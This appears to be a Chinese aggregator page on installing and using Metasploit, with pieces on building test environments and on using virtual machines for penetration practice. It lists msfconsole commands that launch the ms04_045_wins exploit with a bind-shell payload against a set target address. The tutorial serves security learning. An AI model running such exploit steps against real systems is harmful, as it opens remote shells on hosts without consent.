本文目录一览:
如何安装metasploit
一、搭建metasploit环境
Windows环境下安装
metasploit
安装时需要注意要关闭杀毒软件,如果安装有杀毒软件,会提示在metasploit的安装目录下检测到病毒或木马。
二、metasploit的使用
Metasploit目前提供了三种用户使用接口,一个是GUI模式,另一个是console模式,第三种是CLI(命令行)模式。原来还提供一种WEB模式,目前已经不再支持。目前这三种模式各有优缺点,建议在MSF console模式中使用。在console中几乎可以使用MSF所提供的所有功能,还可以在console中执行一些其它的外部命令,如ping。
Windows下GUI启动方式,从开始菜单——Metasploit Framework——Metaspliit GUI即可。如下图所示:
其GUI模式启动后界面如图2所示:
Windows下console模式的启动方式与GUI方式类似,启动后界面如图3所示:
Metasploit的使用较为简单,了解其基本命令即可。下面以console的使用方式为例说明如何使用:
输入help或?可查看帮助信息。
下面以exploit中的ms04_045_wins为例进行说明。
1、show exploits,
2、info exploit/windows/wins/ms04_045_wins,查看其描述信息。
3、use exploit/windows/wins/ms04_045_wins,使用此exploit。
4、show options,查看相应的选项
5、set RHOST 192.168.1.200,设置目标
6、set RPORT 7777,设置端口
7、set PAYLOAD generic/shell_bind_tcp,设置使用的shellcode
8、exploit,执行攻击
如如何搭建测试环境
测试环境搭建步骤:
1.数据库服务器端测试环境安装步骤:
(1) 选择服务器
(2) 安装操作系统
(3) 安装数据库
(4) 安装杀毒软件
(5) 杀毒
(6) 制作Image文件
(7) 安装软件数据库文件
(8) 进行相关数据库配置
(9) 杀毒
(10) 制作Image文件
2. 应用服务器端测试环境安装步骤:
(1) 选择服务器
(2) 安装操作系统
(3) 安装数据库
(4) 安装杀毒软件
(5) 杀毒
(6) 制作Image文件
(7) 安装软件数据库文件
(8) 进行相关数据库配置
(9) 杀毒
(10)制作Image文件
3. 客户端测试环境安装步骤:
(1) 选择PC机
(2) 安装操作系统
(3) 安装杀毒软件
(4) 安装软件要求的浏览器版本
(5) 测试与应用服务器的链接
(6) 杀毒
(7) 制作Image文件。
黑客渗透需要搭建虚拟机吗
肯定是需要搭建虚拟机的,搭建渗透环境,本地测试,如果在是实体机上搭建就容易中毒等情况。